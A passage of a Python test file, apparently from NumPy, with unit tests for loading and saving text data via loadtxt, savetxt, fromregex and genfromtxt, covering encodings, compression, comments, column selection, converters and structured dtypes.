b = np.loadtxt(os.path.join(tmpdir, 'test.csv' + suffix),
encoding='UTF-16-LE', dtype=np.unicode)
assert_array_equal(a, b)
def test_unicode_bytestream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
s = BytesIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read().decode('UTF-8'), utf8 + '\n')
def test_unicode_stringstream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
s = StringIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read(), utf8 + '\n')
class LoadTxtBase(object):
def check_compressed(self, fopen, suffixes):
# Test that we can load data from a compressed file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
for suffix in suffixes:
with temppath(suffix=suffix) as name:
with fopen(name, mode='wt', encoding='UTF-32-LE') as f:
f.write(data)
res = self.loadfunc(name, encoding='UTF-32-LE')
assert_array_equal(res, wanted)
with fopen(name, "rt", encoding='UTF-32-LE') as f:
res = self.loadfunc(f)
assert_array_equal(res, wanted)
# Python2 .open does not support encoding
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_gzip(self):
self.check_compressed(gzip.open, ('.gz',))
@pytest.mark.skipif(not HAS_BZ2, reason="Needs bz2")
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_bz2(self):
self.check_compressed(bz2.open, ('.bz2',))
@pytest.mark.skipif(not HAS_LZMA, reason="Needs lzma")
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_lzma(self):
self.check_compressed(lzma.open, ('.xz', '.lzma'))
def test_encoding(self):
with temppath() as path:
with open(path, "wb") as f:
f.write('0.\n1.\n2.'.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16")
assert_array_equal(x, [0., 1., 2.])
def test_stringload(self):
# umlaute
nonascii = b'\xc3\xb6\xc3\xbc\xc3\xb6'.decode("UTF-8")
with temppath() as path:
with open(path, "wb") as f:
f.write(nonascii.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16", dtype=np.unicode)
assert_array_equal(x, nonascii)
def test_binary_decode(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=np.unicode, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_converters_decode(self):
# test converters that decode strings
c = TextIO()
c.write(b'\xcf\x96')
c.seek(0)
x = self.loadfunc(c, dtype=np.unicode,
converters={0: lambda x: x.decode('UTF-8')})
a = np.array([b'\xcf\x96'.decode('UTF-8')])
assert_array_equal(x, a)
def test_converters_nodecode(self):
# test native string converters enabled by setting an encoding
utf8 = b'\xcf\x96'.decode('UTF-8')
with temppath() as path:
with io.open(path, 'wt', encoding='UTF-8') as f:
f.write(utf8)
x = self.loadfunc(path, dtype=np.unicode,
converters={0: lambda x: x + 't'},
encoding='UTF-8')
a = np.array([utf8 + 't'])
assert_array_equal(x, a)
class TestLoadTxt(LoadTxtBase):
loadfunc = staticmethod(np.loadtxt)
def setup(self):
# lower chunksize for testing
self.orig_chunk = np.lib.npyio._loadtxt_chunksize
np.lib.npyio._loadtxt_chunksize = 1
def teardown(self):
np.lib.npyio._loadtxt_chunksize = self.orig_chunk
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments_unicode(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=u'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_byte(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=b'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_multiple(self):
c = TextIO()
c.write('# comment\n1,2,3\n@ comment2\n4,5,6 // comment3')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=['#', '@', '//'])
a = np.array([[1, 2, 3], [4, 5, 6]], int)
assert_array_equal(x, a)
def test_comments_multi_chars(self):
c = TextIO()
c.write('/* comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='/*')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
# Check that '/*' is not transformed to ['/', '*']
c = TextIO()
c.write('*/ comment\n1,2,3,5\n')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, dtype=int, delimiter=',',
comments='/*')
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Testing with an integer instead of a sequence
for int_type in [int, np.int8, np.int16,
np.int32, np.int64, np.uint8, np.uint16,
np.uint32, np.uint64]:
to_read = int_type(1)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=to_read)
assert_array_equal(x, a[:, 1])
# Testing with some crazy custom integer type
class CrazyInt(object):
def __index__(self):
return 1
crazy_int = CrazyInt()
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=crazy_int)
assert_array_equal(x, a[:, 1])
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(crazy_int,))
assert_array_equal(x, a[:, 1])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
# Testing non-ints in usecols
c.seek(0)
bogus_idx = 1.5
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=bogus_idx
)
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=[0, bogus_idx, 0]
)
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_str_dtype(self):
# see gh-8033
c = ["str1", "str2"]
for dt in (str, np.bytes_):
a = np.array(["str1", "str2"], dtype=dt)
x = np.loadtxt(c, dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_from_float_hex(self):
# IEEE doubles and floats only, otherwise the float32
# conversion may fail.
tgt = np.logspace(-10, 10, 5).astype(np.float32)
tgt = np.hstack((tgt, -tgt)).astype(float)
inp = '\n'.join(map(float.hex, tgt))
c = TextIO()
c.write(inp)
for dt in [float, np.float32]:
c.seek(0)
res = np.loadtxt(c, dtype=dt)
assert_equal(res, tgt, err_msg="%s" % dt)
def test_from_complex(self):
tgt = (complex(1, 1), complex(1, -1))
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, tgt)
def test_complex_misformatted(self):
# test for backward compatibility
# some complex formats used to generate x+-yj
a = np.zeros((2, 2), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.16e')
c.seek(0)
txt = c.read()
c.seek(0)
# misformat the sign on the imaginary part, gh 7895
txt_bad = txt.replace(b'e+00-', b'e00+-')
assert_(txt_bad != txt)
c.write(txt_bad)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, a)
def test_universal_newline(self):
with temppath() as name:
with open(name, 'w') as f:
f.write('1 21\r3 42\r')
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
def test_bad_line(self):
c = TextIO()
c.write('1 2 3\n4 5 6\n2 3')
c.seek(0)
# Check for exception and that exception contains line number
assert_raises_regex(ValueError, "3", np.loadtxt, c)
def test_none_as_string(self):
# gh-5155, None should work as string when format demands it
c = TextIO()
c.write('100,foo,200\n300,None,400')
c.seek(0)
dt = np.dtype([('x', int), ('a', 'S10'), ('y', int)])
np.loadtxt(c, delimiter=',', dtype=dt, comments=None) # Should succeed
@pytest.mark.skipif(locale.getpreferredencoding() == 'ANSI_X3.4-1968',
reason="Wrong preferred encoding")
def test_binary_load(self):
butf8 = b"5,6,7,\xc3\x95scarscar\n\r15,2,3,hello\n\r"\
b"20,2,3,\xc3\x95scar\n\r"
sutf8 = butf8.decode("UTF-8").replace("\r", "").splitlines()
with temppath() as path:
with open(path, "wb") as f:
f.write(butf8)
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype=np.unicode)
assert_array_equal(x, sutf8)
# test broken latin1 conversion people now rely on
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype="S")
x = [b'5,6,7,\xc3\x95scarscar', b'15,2,3,hello', b'20,2,3,\xc3\x95scar']
assert_array_equal(x, np.array(x, dtype="S"))
def test_max_rows(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_max_rows_with_skiprows(self):
c = TextIO()
c.write('comments\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
def test_max_rows_with_read_continuation(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
# test continuation
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([2,1,4,5], int)
assert_array_equal(x, a)
def test_max_rows_larger(self):
#test max_rows > num rows
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=6)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8], [2, 1, 4, 5]], int)
assert_array_equal(x, a)
class Testfromregex(object):
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
def test_record_unicode(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'1.312 foo' + utf8 + b' \n1.534 bar\n4.444 qux')
dt = [('num', np.float64), ('val', 'U4')]
x = np.fromregex(path, r"(?u)([0-9.]+)\s+(\w+)", dt, encoding='UTF-8')
a = np.array([(1.312, 'foo' + utf8.decode('UTF-8')), (1.534, 'bar'),
(4.444, 'qux')], dtype=dt)
assert_array_equal(x, a)
regexp = re.compile(r"([0-9.]+)\s+(\w+)", re.UNICODE)
x = np.fromregex(path, regexp, dt, encoding='UTF-8')
assert_array_equal(x, a)
def test_compiled_bytes(self):
regexp = re.compile(b'(\\d)')
c = BytesIO(b'123')
dt = [('num', np.float64)]
a = np.array([1, 2, 3], dtype=dt)
x = np.fromregex(c, regexp, dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(LoadTxtBase):
loadfunc = staticmethod(np.genfromtxt)
def test_record(self):
# Test w/ explicit dtype
data = TextIO('1 2\n3 4')
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
# Test outputting a standard ndarray
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
# Test squeezing to 1D
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
# Test the stripping of comments
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
# Test row skipping
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
# Test retrieving a header
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.ndfromtxt(data, dtype=None, names=True)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
# Test the automatic definition of the output dtype
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.ndfromtxt(data, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
# Tests whether the output dtype can be uniformized
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
# Test overwriting the names of the dtype
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
# Check that names can be retrieved even if the line is commented out.
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test, ctrl)
def test_names_and_comments_none(self):
# Tests case when names is true but comments is None (gh-10780)
data = TextIO('col1 col2\n 1 2\n 3 4')
test = np.genfromtxt(data, dtype=(int, int), comments=None, names=True)
control = np.array([(1, 2), (3, 4)], dtype=[('col1', int), ('col2', int)])
assert_equal(test, control)
def test_autonames_and_usecols(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
# Test the combination user-defined converters and usecol
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None,
converters={'C': lambda s: 2 * int(s)})
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
# Test the conversion to datetime.
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
# Test the conversion to datetime64.
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
# Test whether unused converters are forgotten
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
